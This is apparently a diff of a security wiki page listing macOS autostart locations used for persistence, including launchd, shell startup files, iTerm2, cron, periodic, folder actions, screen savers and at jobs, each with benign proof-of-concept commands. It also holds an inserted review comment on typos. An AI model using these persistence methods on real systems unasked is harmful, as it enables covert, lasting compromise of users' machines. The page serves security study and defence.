+This section is heavily based on the blog series [**Beyond the good ol' LaunchAgents**](https://theevilbit.github.io/beyond/), the goal is to add **more Autostart Locations** (if possible), indicate **which techniques are still working** nowadays with latest version of macOS (13.4) and to specify the **permissions** needed.
### Launchd
+#### Locations
+
+* **`/Library/LaunchAgents`**
+ * **Trigger**: Reboot
+ * Root required
+* **`/Library/LaunchDaemons`**
+ * **Trigger**: Reboot
+ * Root required
+* **`/System/Library/LaunchAgents`**
+ * **Trigger**: Reboot
+ * Root required
+* **`/System/Library/LaunchDaemons`**
+ * **Trigger**: Reboot
+ * Root required
+* **`~/Library/LaunchAgents`**
+ * **Trigger**: Relog-in
+* **`~/Library/LaunchDemons`**
+ * **Trigger**: Relog-in
+
+#### Description & Payload
+
**`launchd`** is the **first** **process** executed by OX S kernel at startup and the last one to finish at shut down. It should always have the **PID 1**. This process will **read and execute** the configurations indicated in the **ASEP** **plists** in:
* `/Library/LaunchAgents`: Per-user agents installed by the admin
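Review bot: The last entry of the new Locations list is spelled `~/Library/LaunchDemons`, which does not match the `LaunchDaemons` spelling used by the other entries, and launchd is not documented to load a per-user daemons directory from the home folder; either correct it to `~/Library/LaunchDaemons` or, if the entry cannot be confirmed to be honoured by launchd, drop it rather than list it as an autostart location. The rewritten hint in the next hunk keeps the path `/System/Library/LaunchDaemos/com.apple.smdb.plist`, where `LaunchDaemos` looks like the same kind of typo and should read `LaunchDaemons`. The two `/System/Library` entries are marked "Root required", which may be worth qualifying: on recent macOS those paths live on the sealed system volume and are presumably not writable even as root, so confirm against the 13.4 target named in the intro before keeping that wording.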
@@ -36,7 +57,7 @@ The **main difference between agents and daemons is that agents are loaded when
com.apple.someidentifierProgramArguments
- /Users/username/malware
+ bash -c 'touch /tmp/launched'RunAtLoadStartInterval
@@ -52,10 +73,12 @@ The **main difference between agents and daemons is that agents are loaded when
There are cases where an **agent needs to be executed before the user logins**, these are called **PreLoginAgents**. For example, this is useful to provide assistive technology at login. They can be found also in `/Library/LaunchAgents`(see [**here**](https://github.com/HelmutJ/CocoaSampleCode/tree/master/PreLoginAgents) an example).
-\{% hint style="info" %\} New Daemons or Agents config files will be **loaded after next reboot or using** `launchctl load ` It's **also possible to load .plist files without that extension** with `launchctl -F ` (however those plist files won't be automatically loaded after reboot).\
+{% hint style="info" %}
+New Daemons or Agents config files will be **loaded after next reboot or using** `launchctl load ` It's **also possible to load .plist files without that extension** with `launchctl -F ` (however those plist files won't be automatically loaded after reboot).\
It's also possible to **unload** with `launchctl unload ` (the process pointed by it will be terminated),
-To **ensure** that there isn't **anything** (like an override) **preventing** an **Agent** or **Daemon** **from** **running** run: `sudo launchctl load -w /System/Library/LaunchDaemos/com.apple.smdb.plist` \{% endhint %\}
+To **ensure** that there isn't **anything** (like an override) **preventing** an **Agent** or **Daemon** **from** **running** run: `sudo launchctl load -w /System/Library/LaunchDaemos/com.apple.smdb.plist`
+{% endhint %}
List all the agents and daemons loaded by the current user:
@@ -63,8 +86,161 @@ List all the agents and daemons loaded by the current user:
launchctl list
```
+### shell startup files
+
+Writeup: [https://theevilbit.github.io/beyond/beyond\_0001/](https://theevilbit.github.io/beyond/beyond\_0001/)\
+Writeup (xterm): [https://theevilbit.github.io/beyond/beyond\_0018/](https://theevilbit.github.io/beyond/beyond\_0018/)
+
+#### Locations
+
+* **`~/.zshrc`, `~/.zlogin`, `~/.zshenv`, `~/.zprofile`**
+ * **Trigger**: Open a terminal with zsh
+* **`/etc/zshenv`, `/etc/zprofile`, `/etc/zshrc`, `/etc/zlogin`**
+ * **Trigger**: Open a terminal with zsh
+ * Root required
+* **`~/.zlogout`**
+ * **Trigger**: Exit a terminal with zsh
+* **`/etc/zlogout`**
+ * **Trigger**: Exit a terminal with zsh
+ * Root required
+* Potentially more in: **`man zsh`**
+* **`~/.bashrc`**
+ * **Trigger**: Open a terminal with bash
+* `/etc/profile` (didn't work)
+* `~/.profile` (didn't work)
+* `~/.xinitrc`, `~/.xserverrc`, `/opt/X11/etc/X11/xinit/xinitrc.d/`
+ * **Trigger**: Expected to trigger with xterm, but it **isn't installed** and even after installed this error is thrown: xterm: `DISPLAY is not set`
+
+#### Description
+
+Shell startup files are executed when our shell environment like `zsh` or `bash` is **starting up**. macOS defaults to `/bin/zsh` these days, and **whenever we open `Terminal` or SSH** into the device, this is the shell environment we are placed into. `bash` and `sh` are still available, however they have to be specifically started.
+
+The man page of zsh, which we can read with **`man zsh`** has a long description of the startup files.
+
+```bash
+# Example executino via ~/.zshrc
+echo "touch /tmp/hacktricks" >> ~/.zshrc
+```
+
+### iTerm2
+
+Writeup: [https://theevilbit.github.io/beyond/beyond\_0002/](https://theevilbit.github.io/beyond/beyond\_0002/)
+
+#### Locations
+
+* **`~/Library/Application Support/iTerm2/Scripts/AutoLaunch`**
+ * **Trigger**: Open iTerm
+* **`~/Library/Application Support/iTerm2/Scripts/AutoLaunch.scpt`**
+ * **Trigger**: Open iTerm
+* **`~/Library/Preferences/com.googlecode.iterm2.plist`**
+ * **Trigger**: Open iTerm
+
+#### Description
+
+Scripts stored in **`~/Library/Application Support/iTerm2/Scripts/AutoLaunch`** will be executed. For example:
+
+```bash
+cat > "$HOME/Library/Application Support/iTerm2/Scripts/AutoLaunch/a.sh" << EOF
+#!/bin/bash
+touch /tmp/iterm2-autolaunch
+EOF
+
+chmod +x "$HOME/Library/Application Support/iTerm2/Scripts/AutoLaunch/a.sh"
+```
+
+The script **`~/Library/Application Support/iTerm2/Scripts/AutoLaunch.scpt`** will also be executed:
+
+```bash
+do shell script "touch /tmp/iterm2-autolaunchscpt"
+```
+
+The iTerm2 preferences located in **`~/Library/Preferences/com.googlecode.iterm2.plist`** can **indicate a command to execute** when the iTerm2 terminal is opened.
+
+This setting can be configured in the iTerm2 settings:
+
+
+
+And the command is reflected in the preferences:
+
+```bash
+plutil -p com.googlecode.iterm2.plist
+{
+ [...]
+ "New Bookmarks" => [
+ 0 => {
+ [...]
+ "Initial Text" => "touch /tmp/iterm-start-command"
+```
+
+You can set the command to execute with:
+
+{% code overflow="wrap" %}
+```bash
+# Add
+/usr/libexec/PlistBuddy -c "Set :\"New Bookmarks\":0:\"Initial Text\" 'touch /tmp/iterm-start-command'" $HOME/Library/Preferences/com.googlecode.iterm2.plist
+
+# Remove
+/usr/libexec/PlistBuddy -c "Set :\"New Bookmarks\":0:\"Initial Text\" ''" $HOME/Library/Preferences/com.googlecode.iterm2.plist
+```
+{% endcode %}
+
+{% hint style="warning" %}
+Highly probable there are **other ways to abuse the iTerm2 preferences** to execute arbitrary commands.
+{% endhint %}
+
+### Re-opened Applications
+
+**Writeup**: [https://theevilbit.github.io/beyond/beyond\_0021/](https://theevilbit.github.io/beyond/beyond\_0021/)
+
+#### Location
+
+* **`~/Library/Preferences/ByHost/com.apple.loginwindow..plist`**
+ * **Trigger**: Restart reopening applications
+
+#### Description & Exploit
+
+All the applications to reopen are inside the plist `~/Library/Preferences/ByHost/com.apple.loginwindow..plist`
+
+So, make the reopen applications launch your own one, you just need to **add your app to the list**.
+
+The UUID can be found listing that directory or with `ioreg -rd1 -c IOPlatformExpertDevice | awk -F'"' '/IOPlatformUUID/{print $4}'`
+
+To check the applications that will be reopened you can do:
+
+```bash
+defaults -currentHost read com.apple.loginwindow TALAppsToRelaunchAtLogin
+#or
+plutil -p ~/Library/Preferences/ByHost/com.apple.loginwindow..plist
+```
+
+To **add an application to this list** you can use:
+
+```bash
+# Adding iTerm2
+/usr/libexec/PlistBuddy -c "Add :TALAppsToRelaunchAtLogin: dict" \
+ -c "Set :TALAppsToRelaunchAtLogin:$:BackgroundState 2" \
+ -c "Set :TALAppsToRelaunchAtLogin:$:BundleID com.googlecode.iterm2" \
+ -c "Set :TALAppsToRelaunchAtLogin:$:Hide 0" \
+ -c "Set :TALAppsToRelaunchAtLogin:$:Path /Applications/iTerm.app" \
+ ~/Library/Preferences/ByHost/com.apple.loginwindow..plist
+```
+
+{% hint style="danger" %}
+Adding the previous section and loging-out and loging-in or even rebooting didn't work for me to execute the app. (The app wasn't being executed, maybe it needs to be running when these actions are performed)
+{% endhint %}
+
### Cron
+**Writeup**: [https://theevilbit.github.io/beyond/beyond\_0004/](https://theevilbit.github.io/beyond/beyond\_0004/)
+
+#### Location
+
+* **`/usr/lib/cron/tabs/`, `/private/var/at/tabs`, `/private/var/at/jobs`, `/etc/periodic/`**
+ * Root required for direct write access. No root required if you can execute `crontab `
+ * **Trigger**: Depends on the cron job
+
+#### Description & Exploit
+
List the cron jobs of the **current user** with:
```bash
@@ -81,14 +257,410 @@ ls -lR /usr/lib/cron/tabs/ /private/var/at/jobs /etc/periodic/
There you can find the regular **cron** **jobs**, the **at** **jobs** (not very used) and the **periodic** **jobs** (mainly used for cleaning temporary files). The daily periodic jobs can be executed for example with: `periodic daily`.
-The periodic scripts (**`/etc/periodic`**) are executed because of the **launch daemons** configured in `/System/Library/LaunchDaemons/com.apple.periodic*`. Note that if a script is stored in `/etc/periodic/` as a way to **escalate privilege**s, it will be **executed** as the **owner of the file**.
+To add a **user cronjob programatically** it's possible to use:
```bash
+echo '* * * * * /bin/bash -c "touch /tmp/cron3"' > /tmp/cron
+crontab /tmp/cron
+```
+
+### Periodic
+
+Writeup: [https://theevilbit.github.io/beyond/beyond\_0019/](https://theevilbit.github.io/beyond/beyond\_0019/)
+
+#### Location
+
+* `/etc/periodic/daily`, `/etc/periodic/weekly`, `/etc/periodic/monthly`, `/usr/local/etc/periodic`
+ * Root required
+ * **Trigger**: When the time comes
+* `/etc/daily.local`, `/etc/weekly.local` or `/etc/monthly.local`
+ * Root required
+ * **Trigger**: When the time comes
+
+#### Description & Exploit
+
+The periodic scripts (**`/etc/periodic`**) are executed because of the **launch daemons** configured in `/System/Library/LaunchDaemons/com.apple.periodic*`. Note that scripts stored in `/etc/periodic/` are **executed** as the **owner of the file,** so this won't work for a potential privilege escalation.
+
+{% code overflow="wrap" %}
+```bash
+# Launch daemons that will execute the periodic scripts
ls -l /System/Library/LaunchDaemons/com.apple.periodic*
-rw-r--r-- 1 root wheel 887 May 13 00:29 /System/Library/LaunchDaemons/com.apple.periodic-daily.plist
-rw-r--r-- 1 root wheel 895 May 13 00:29 /System/Library/LaunchDaemons/com.apple.periodic-monthly.plist
-rw-r--r-- 1 root wheel 891 May 13 00:29 /System/Library/LaunchDaemons/com.apple.periodic-weekly.plist
+
+# The scripts located in their locations
+ls -lR /etc/periodic
+total 0
+drwxr-xr-x 11 root wheel 352 May 13 00:29 daily
+drwxr-xr-x 5 root wheel 160 May 13 00:29 monthly
+drwxr-xr-x 3 root wheel 96 May 13 00:29 weekly
+
+/etc/periodic/daily:
+total 72
+-rwxr-xr-x 1 root wheel 1642 May 13 00:29 110.clean-tmps
+-rwxr-xr-x 1 root wheel 695 May 13 00:29 130.clean-msgs
+[...]
+
+/etc/periodic/monthly:
+total 24
+-rwxr-xr-x 1 root wheel 888 May 13 00:29 199.rotate-fax
+-rwxr-xr-x 1 root wheel 1010 May 13 00:29 200.accounting
+-rwxr-xr-x 1 root wheel 606 May 13 00:29 999.local
+
+/etc/periodic/weekly:
+total 8
+-rwxr-xr-x 1 root wheel 620 May 13 00:29 999.local
```
+{% endcode %}
+
+There are other periodic scripts that will be executed indicated in **`/etc/defaults/periodic.conf`**:
+
+```bash
+grep "Local scripts" /etc/defaults/periodic.conf
+daily_local="/etc/daily.local" # Local scripts
+weekly_local="/etc/weekly.local" # Local scripts
+monthly_local="/etc/monthly.local" # Local scripts
+```
+
+If you manage to write any of the files `/etc/daily.local`, `/etc/weekly.local` or `/etc/monthly.local` it will be **executed sooner or later**.
+
+### PAM
+
+Writeup: [Linux Hacktricks PAM](../linux-hardening/linux-post-exploitation/pam-pluggable-authentication-modules.md)\
+Writeup: [https://theevilbit.github.io/beyond/beyond\_0005/](https://theevilbit.github.io/beyond/beyond\_0005/)
+
+#### Location
+
+* Root always required
+
+#### Description
+
+As PAM is more focused in **persistence** and malware that on easy execution inside macOS, this blog won't give a detailed explanation, **read the writeups to understand this technique better**.
+
+### SSHRC
+
+Writeup: [https://theevilbit.github.io/beyond/beyond\_0006/](https://theevilbit.github.io/beyond/beyond\_0006/)
+
+#### Location
+
+* **`~/.ssh/rc`**
+ * **Trigger**: Login via ssh
+* **`/etc/ssh/sshrc`**
+ * Root required
+ * **Trigger**: Login via ssh
+
+#### Description
+
+By default, unless `PermitUserRC no` in `/etc/ssh/sshd_config`, when a user **logins via SSH** the scripts **`/etc/ssh/sshrc`** and **`~/.ssh/rc`** will be executed.
+
+### xbar
+
+Writeup: [https://theevilbit.github.io/beyond/beyond\_0007/](https://theevilbit.github.io/beyond/beyond\_0007/)
+
+#### Location
+
+* **`~/Library/Application\ Support/xbar/plugins/`**
+ * **Trigger**: Once xbar is executed
+
+#### Description
+
+If the popular program [**xbar**](https://github.com/matryer/xbar) is installed, it's possible to write a shell script in **`~/Library/Application\ Support/xbar/plugins/`** which will be executed when xbar is started:
+
+```bash
+cat > "$HOME/Library/Application Support/xbar/plugins/a.sh" << EOF
+#!/bin/bash
+touch /tmp/xbar
+EOF
+chmod +x "$HOME/Library/Application Support/xbar/plugins/a.sh"
+```
+
+### Hammerspoon
+
+**Writeup**: [https://theevilbit.github.io/beyond/beyond\_0008/](https://theevilbit.github.io/beyond/beyond\_0008/)
+
+#### Location
+
+* **`~/.hammerspoon/init.lua`**
+ * **Trigger**: Once hammerspoon is executed
+
+#### Description
+
+[**Hammerspoon**](https://github.com/Hammerspoon/hammerspoon) is an automation tool, that allows **macOS scripting through LUA scripting language**. We can even embed full AppleScript code as well as run shell scripts.
+
+The app looks for a single file, `~/.hammerspoon/init.lua`, and when started the script will be executed.
+
+```bash
+cat > "$HOME/.hammerspoon/init.lua" << EOF
+hs.execute("id > /tmp/hs.txt")
+EOF
+```
+
+### Preference Pane
+
+Writeup: [https://theevilbit.github.io/beyond/beyond\_0009/](https://theevilbit.github.io/beyond/beyond\_0009/)
+
+#### Location
+
+* **`/System/Library/PreferencePanes`**
+* **`/Library/PreferencePanes`**
+* **`~/Library/PreferencePanes`**
+
+#### Description
+
+It doesn't look like this is working anymore.
+
+### Spotlight Importers
+
+Writeup: [https://theevilbit.github.io/beyond/beyond\_0011/](https://theevilbit.github.io/beyond/beyond\_0011/)
+
+#### Location
+
+* **`/Library/Spotlight`**
+* **`~/Library/Spotlight`**
+
+#### Description
+
+You will end up in a **heavy sandbox**, so you probably don't want to use this technique.
+
+### Audio Plugins
+
+Writeup: [https://theevilbit.github.io/beyond/beyond\_0013/](https://theevilbit.github.io/beyond/beyond\_0013/)\
+Writeup: [https://posts.specterops.io/audio-unit-plug-ins-896d3434a882](https://posts.specterops.io/audio-unit-plug-ins-896d3434a882)
+
+#### Location
+
+* **`/Library/Audio/Plug-Ins/HAL`**
+ * Root required
+ * **Trigger**: Restart coreaudiod or the computer
+* **`/Library/Audio/Plug-ins/Components`**
+ * Root required
+ * **Trigger**: Restart coreaudiod or the computer
+* **`~/Library/Audio/Plug-ins/Components`**
+ * **Trigger**: Restart coreaudiod or the computer
+* **`/System/Library/Components`**
+ * Root required
+ * **Trigger**: Restart coreaudiod or the computer
+
+#### Description
+
+According to the previous writeups it's possible to **compile some audio plugins** and get them loaded.
+
+### Folder Actions
+
+Writeup: [https://theevilbit.github.io/beyond/beyond\_0024/](https://theevilbit.github.io/beyond/beyond\_0024/)\
+Writeup: [https://posts.specterops.io/folder-actions-for-persistence-on-macos-8923f222343d](https://posts.specterops.io/folder-actions-for-persistence-on-macos-8923f222343d)
+
+#### Location
+
+* `/Library/Scripts/Folder Action Scripts`
+ * Root required
+* `~/Library/Scripts/Folder Action Scripts`
+
+#### Description & Exploitation
+
+A Folder Action script is executed when the folder to which it is attached has items added or removed, or when its window is opened, closed, moved, or resized:
+
+* Open the folder via the Finder UI
+* Add a file to the folder (can be done via drag/drop or even in a shell prompt from a terminal)
+* Remove a file from the folder (can be done via drag/drop or even in a shell prompt from a terminal)
+* Navigate out of the folder via the UI
+
+There are a couple ways to implement this:
+
+1. Use the [Automator](https://support.apple.com/guide/automator/welcome/mac) program to create a Folder Action workflow file (.workflow) and install it as a service.
+2. Right-click on a folder, select `Folder Actions Setup...`, `Run Service`, and manually attach a script.
+3. Use OSAScript to send Apple Event messages to the `System Events.app` to programmatically query and register a new `Folder Action.`
+
+* This is the way to implement persistence using an OSAScript to send Apple Event messages to `System Events.app`
+
+This is the script that will be executed:
+
+{% code title="source.js" %}
+```applescript
+var app = Application.currentApplication();
+app.includeStandardAdditions = true;
+app.doShellScript("touch /tmp/folderaction.txt");
+app.doShellScript("touch ~/Desktop/folderaction.txt");
+app.doShellScript("mkdir /tmp/asd123");
+app.doShellScript("cp -R ~/Desktop /tmp/asd123");
+```
+{% endcode %}
+
+Compile it with: `osacompile -l JavaScript -o folder.scpt source.js`
+
+Then execute the following script to enable Folder Actions and attach the previously compiled script with the folde **`/users/username/Desktop`**:
+
+```javascript
+var se = Application("System Events");
+se.folderActionsEnabled = true;
+var myScript = se.Script({name: "source.js", posixPath: "/tmp/source.js"});
+var fa = se.FolderAction({name: "Desktop", path: "/Users/username/Desktop"});
+se.folderActions.push(fa);
+fa.scripts.push(myScript);
+```
+
+Execute script with: `osascript -l JavaScript /Users/carlospolop/attach.scpt`
+
+
+
+* This is the way yo implement this persistence via GUI:
+
+This is the script that will be executed:
+
+{% code title="source.js" %}
+```applescript
+var app = Application.currentApplication();
+app.includeStandardAdditions = true;
+app.doShellScript("touch /tmp/folderaction.txt");
+app.doShellScript("touch ~/Desktop/folderaction.txt");
+app.doShellScript("mkdir /tmp/asd123");
+app.doShellScript("cp -R ~/Desktop /tmp/asd123");
+```
+{% endcode %}
+
+Compile it with: `osacompile -l JavaScript -o folder.scpt source.js`
+
+Move it to:
+
+```bash
+mkdir -p "$HOME/Library/Scripts/Folder Action Scripts"
+mv /tmp/folder.scpt "$HOME/Library/Scripts/Folder Action Scripts"
+```
+
+Then, open the `Folder Actions Setup` app, select the **folder you would like to watch** and select in your case **`folder.scpt`** (in my case I called it output2.scp):
+
+
+
+Now, if you open that folder with **Finder**, your script will be executed.
+
+This configuration was stored in the **plist** located in **`~/Library/Preferences/com.apple.FolderActionsDispatcher.plist`** in base64 format.
+
+Now, lets try to prepare this persistence without GUI access:
+
+1. **Copy `~/Library/Preferences/com.apple.FolderActionsDispatcher.plist`** to `/tmp` to backup it:
+ * `cp ~/Library/Preferences/com.apple.FolderActionsDispatcher.plist /tmp`
+2. **Remove** the Folder Actions you just set:
+
+
+
+Now that we have an empty environment
+
+3. Copy the backup file: `cp /tmp/com.apple.FolderActionsDispatcher.plist ~/Library/Preferences/`
+4. Open the Folder Actions Setup.app to consume this config: `open "/System/Library/CoreServices/Applications/Folder Actions Setup.app/"`
+
+{% hint style="danger" %}
+And this didn't work for me, but those are the instructions from the writeup:(
+{% endhint %}
+
+### Dock shortcuts
+
+Writeup: [https://theevilbit.github.io/beyond/beyond\_0027/](https://theevilbit.github.io/beyond/beyond\_0027/)
+
+#### Location
+
+* `~/Library/Preferences/com.apple.dock.plist`
+ * **Trigger**: When the user clicks on the app inside the dock
+
+#### Description & Exploitation
+
+All the applications that appear in the Dock are specified inside the plist: **`~/Library/Preferences/com.apple.dock.plist`**
+
+It's possible to **add an application** just with:
+
+{% code overflow="wrap" %}
+```bash
+# Add /System/Applications/Books.app
+defaults write com.apple.dock persistent-apps -array-add 'tile-datafile-data_CFURLString/System/Applications/Books.app_CFURLStringType0'
+
+# Restart Dock
+killall Dock
+```
+{% endcode %}
+
+### emond
+
+Writeup: [https://theevilbit.github.io/beyond/beyond\_0023/](https://theevilbit.github.io/beyond/beyond\_0023/)
+
+I cannot find this component in my macOS so for more info check the writeup
+
+### QuickLook Plugins
+
+Writeup: [https://theevilbit.github.io/beyond/beyond\_0028/](https://theevilbit.github.io/beyond/beyond\_0028/)
+
+#### Location
+
+* `/System/Library/QuickLook`
+* `/Library/QuickLook`
+* `~/Library/QuickLook`
+* `/Applications/AppNameHere/Contents/Library/QuickLook/`
+* `~/Applications/AppNameHere/Contents/Library/QuickLook/`
+
+#### Description & Exploitation
+
+QuickLook plugins can be executed when you **trigger the preview of a file** (press space bar with the file selected in Finder) and a **plugin supporting that file type** is installed.
+
+It's possible to compile your own QuickLook plugin, place it in one of the prevous locations to load it and then go to a supported file and press space to trigger it.
+
+### Authorization Plugins
+
+Writeup: [https://theevilbit.github.io/beyond/beyond\_0028/](https://theevilbit.github.io/beyond/beyond\_0028/)\
+Writeup: [https://posts.specterops.io/persistent-credential-theft-with-authorization-plugins-d17b34719d65](https://posts.specterops.io/persistent-credential-theft-with-authorization-plugins-d17b34719d65)
+
+#### Location
+
+* `/Library/Security/SecurityAgentPlugins/`
+ * Root required
+ * It's also needed
+
+#### Description & Exploitation
+
+Todo
+
+### Color Pickers
+
+Writeup: [https://theevilbit.github.io/beyond/beyond\_0017](https://theevilbit.github.io/beyond/beyond\_0017/)
+
+#### Location
+
+* `/Library/ColorPickers`
+ * Root required
+ * Trigger: Use the color picker
+* `~/Library/ColorPickers`
+ * Trigger: Use the color picker
+
+#### Description & Exploit
+
+**Compile a color picker** bundle with your code (you could use [**this one for example**](https://github.com/viktorstrate/color-picker-plus)) and add a constructor (like in the [Screen Saver section](macos-auto-start-locations.md#screen-saver)) and copy the bundle to `~/Library/ColorPickers`.
+
+Then, when the color picker is triggered your should should be aswell.
+
+Note that the binary loading your library has a **very restrictive sandbox**: `/System/Library/Frameworks/AppKit.framework/Versions/C/XPCServices/LegacyExternalColorPickerService-x86_64.xpc/Contents/MacOS/LegacyExternalColorPickerService-x86_64`
+
+{% code overflow="wrap" %}
+```bash
+[Key] com.apple.security.temporary-exception.sbpl
+ [Value]
+ [Array]
+ [String] (deny file-write* (home-subpath "/Library/Colors"))
+ [String] (allow file-read* process-exec file-map-executable (home-subpath "/Library/ColorPickers"))
+ [String] (allow file-read* (extension "com.apple.app-sandbox.read"))
+```
+{% endcode %}
+
+### XQuartz
+
+Writeup: [https://theevilbit.github.io/beyond/beyond\_0018/](https://theevilbit.github.io/beyond/beyond\_0018/)
+
+#### Location
+
+* **`/opt/X11/etc/X11/xinit/privileged_startx.d`**
+ * Root required
+ * **Trigger**: With XQuartz
+
+#### Description & Exploit
+
+XQuartz is **no longer installed in macOS**, so if you want more info check the writeup.
### kext
@@ -111,8 +683,158 @@ kextunload -b com.apple.driver.ExampleBundle
For more information about [**kernel extensions check this section**](macos-security-and-privilege-escalation/mac-os-architecture#i-o-kit-drivers).
+### amstoold
+
+Writeup: [https://theevilbit.github.io/beyond/beyond\_0029/](https://theevilbit.github.io/beyond/beyond\_0029/)
+
+#### Location
+
+* **`/usr/local/bin/amstoold`**
+ * Root required
+
+#### Description & Exploitation
+
+Apparently the `plist` from `/System/Library/LaunchAgents/com.apple.amstoold.plist` was using this binary while exposing a XPC service... the thing is that the binary didn't exist, so you could place something there and when the XPC service gets called your binary will be called.
+
+I can no longer find this in my macOS.
+
+### xsanctl
+
+Writeup: [https://theevilbit.github.io/beyond/beyond\_0015/](https://theevilbit.github.io/beyond/beyond\_0015/)
+
+#### Location
+
+* **`/Library/Preferences/Xsan/.xsanrc`**
+ * Root required
+ * **Trigger**: When the service is run (rarely)
+
+#### Description & exploit
+
+Apparently it's not very common to run this script and I couldn't even find it in my macOS, so if you want more info check the writeup.
+
+### Screen Saver
+
+Writeup: [https://theevilbit.github.io/beyond/beyond\_0016/](https://theevilbit.github.io/beyond/beyond\_0016/)\
+Writeup: [https://posts.specterops.io/saving-your-access-d562bf5bf90b](https://posts.specterops.io/saving-your-access-d562bf5bf90b)
+
+#### Location
+
+* `/System/Library/Screen Savers`
+ * Root required
+ * **Trigger**: Select the screen saver
+* `/Library/Screen Savers`
+ * Root required
+ * **Trigger**: Select the screen saver
+* `~/Library/Screen Savers`
+ * **Trigger**: Select the screen saver
+
+
+
+#### Description & Exploit
+
+Create a new project in Xcode and select the template to generate a new **Screen Saver**. Then, are your code to it, for example the following code to generate logs.
+
+**Build** it, and copy the `.saver` bundle to **`~/Library/Screen Savers`**. Then, open the Screen Saver GUI and it you just click on it, it should generate a lot of logs:
+
+{% code overflow="wrap" %}
+```bash
+sudo log stream --style syslog --predicate 'eventMessage CONTAINS[c] "hello_screensaver"'
+
+Timestamp (process)[PID]
+2023-09-27 22:55:39.622369+0200 localhost legacyScreenSaver[41737]: (ScreenSaverExample) hello_screensaver void custom(int, const char **)
+2023-09-27 22:55:39.622623+0200 localhost legacyScreenSaver[41737]: (ScreenSaverExample) hello_screensaver -[ScreenSaverExampleView initWithFrame:isPreview:]
+2023-09-27 22:55:39.622704+0200 localhost legacyScreenSaver[41737]: (ScreenSaverExample) hello_screensaver -[ScreenSaverExampleView hasConfigureSheet]
+```
+{% endcode %}
+
+{% hint style="danger" %}
+Note that because inside the entitlements of the binary that loads this code (`/System/Library/Frameworks/ScreenSaver.framework/PlugIns/legacyScreenSaver.appex/Contents/MacOS/legacyScreenSaver`) you can find **`com.apple.security.app-sandbox`** you will be **inside the common application sandbox**.
+{% endhint %}
+
+Saver code:
+
+```objectivec
+//
+// ScreenSaverExampleView.m
+// ScreenSaverExample
+//
+// Created by Carlos Polop on 27/9/23.
+//
+
+#import "ScreenSaverExampleView.h"
+
+@implementation ScreenSaverExampleView
+
+- (instancetype)initWithFrame:(NSRect)frame isPreview:(BOOL)isPreview
+{
+ NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
+ self = [super initWithFrame:frame isPreview:isPreview];
+ if (self) {
+ [self setAnimationTimeInterval:1/30.0];
+ }
+ return self;
+}
+
+- (void)startAnimation
+{
+ NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
+ [super startAnimation];
+}
+
+- (void)stopAnimation
+{
+ NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
+ [super stopAnimation];
+}
+
+- (void)drawRect:(NSRect)rect
+{
+ NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
+ [super drawRect:rect];
+}
+
+- (void)animateOneFrame
+{
+ NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
+ return;
+}
+
+- (BOOL)hasConfigureSheet
+{
+ NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
+ return NO;
+}
+
+- (NSWindow*)configureSheet
+{
+ NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
+ return nil;
+}
+
+__attribute__((constructor))
+void custom(int argc, const char **argv) {
+ NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
+}
+
+@end
+```
+
### **Login Items**
+Writeup: [https://theevilbit.github.io/beyond/beyond\_0003/](https://theevilbit.github.io/beyond/beyond\_0003/)
+
+#### Locations
+
+* **`~/Library/Application Support/com.apple.backgroundtaskmanagementagent`**
+ * **Trigger:** Login
+ * Exploit payload stored calling **`osascript`**
+ * TODO: Find a way to directly it in disk (uf there is any)
+* **`/var/db/com.apple.xpc.launchd/loginitems.501.plist`**
+ * **Trigger:** Login
+ * Root required
+
+#### Description
+
In System Preferences -> Users & Groups -> **Login Items** you can find **items to be executed when the user logs in**.\
It it's possible to list them, add and remove from the command line:
@@ -127,7 +849,9 @@ osascript -e 'tell application "System Events" to make login item at end with pr
osascript -e 'tell application "System Events" to delete login item "itemname"'
```
-These items are stored in the file /Users/\/Library/Application Support/com.apple.backgroundtaskmanagementagent
+These items are stored in the file **`~/Library/Application Support/com.apple.backgroundtaskmanagementagent`**
+
+**Login items** can **also** be indicated in using the API [SMLoginItemSetEnabled](https://developer.apple.com/documentation/servicemanagement/1501557-smloginitemsetenabled?language=objc) which will store the configuration in **`/var/db/com.apple.xpc.launchd/loginitems.501.plist`**
### ZIP as Login Item
@@ -137,6 +861,14 @@ Another options would be to create the files **`.bash_profile`** and **`.zshenv`
### At
+Writeup: [https://theevilbit.github.io/beyond/beyond\_0014/](https://theevilbit.github.io/beyond/beyond\_0014/)
+
+#### Location
+
+* Need to **execute** **`at`** and it must be **enabled**
+
+#### **Description**
+
“At tasks” are used to **schedule tasks at specific times**.\
These tasks differ from cron in that **they are one time tasks** t**hat get removed after executing**. However, they will **survive a system restart** so they can’t be ruled out as a potential threat.
@@ -146,16 +878,84 @@ By **default** they are **disabled** but the **root** user can **enable** **them
sudo launchctl load -F /System/Library/LaunchDaemons/com.apple.atrun.plist
```
-This will create a file at 13:37:
+This will create a file in 1 hour:
```bash
-echo hello > /tmp/hello | at 1337
+echo "echo 11 > /tmp/at.txt" | at now+1
```
+Check the job queue using `atq:`
+
+```shell-session
+sh-3.2# atq
+26 Tue Apr 27 00:46:00 2021
+22 Wed Apr 28 00:29:00 2021
+```
+
+Above we can see two jobs scheduled. We can print the details of the job using `at -c JOBNUMBER`
+
+```shell-session
+sh-3.2# at -c 26
+#!/bin/sh
+# atrun uid=0 gid=0
+# mail csaby 0
+umask 22
+SHELL=/bin/sh; export SHELL
+TERM=xterm-256color; export TERM
+USER=root; export USER
+SUDO_USER=csaby; export SUDO_USER
+SUDO_UID=501; export SUDO_UID
+SSH_AUTH_SOCK=/private/tmp/com.apple.launchd.co51iLHIjf/Listeners; export SSH_AUTH_SOCK
+__CF_USER_TEXT_ENCODING=0x0:0:0; export __CF_USER_TEXT_ENCODING
+MAIL=/var/mail/root; export MAIL
+PATH=/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin; export PATH
+PWD=/Users/csaby; export PWD
+SHLVL=1; export SHLVL
+SUDO_COMMAND=/usr/bin/su; export SUDO_COMMAND
+HOME=/var/root; export HOME
+LOGNAME=root; export LOGNAME
+LC_CTYPE=UTF-8; export LC_CTYPE
+SUDO_GID=20; export SUDO_GID
+_=/usr/bin/at; export _
+cd /Users/csaby || {
